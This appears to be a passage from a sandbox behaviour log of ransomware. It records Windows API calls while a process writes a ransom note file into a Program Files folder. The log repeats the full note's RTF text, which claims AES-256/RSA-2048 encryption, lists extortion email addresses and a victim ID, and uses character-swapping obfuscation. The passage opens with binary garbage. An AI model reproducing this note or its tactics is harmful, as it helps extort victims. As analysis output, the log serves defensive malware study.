\x05\x02=Ë\x18Þ\x88x\x04……!\"ýØ8±ã\x90\x92ÐXÆ\x02\x89\n|Û\x94\x9d.½g\x97´³ã{©B Ú7)\x137ùû\n°\x80\x1b+Bôcà]Æ\x96LÇè\x99\x0cRRúu\x02°2̲§Û3ÿPH\x03û¥g·nïß\x04¯Â#5c\x03ay\x0c$ç¨\x17ïWæ¼Ñù\x021+Ùv\x05ÌW.#\x8cJÈ\x99Ú°", lpUsedDefaultChar=0x0) returned 7247 [0078.138] WriteFile (in: hFile=0x208, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0078.139] CloseHandle (hObject=0x208) returned 1 [0078.140] GetFileAttributesW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\BG85_INFO.rtf" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\bg85_info.rtf")) returned 0xffffffff [0078.140] GetLastError () returned 0x2 [0078.140] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\BG85_INFO.rtf" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0078.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s 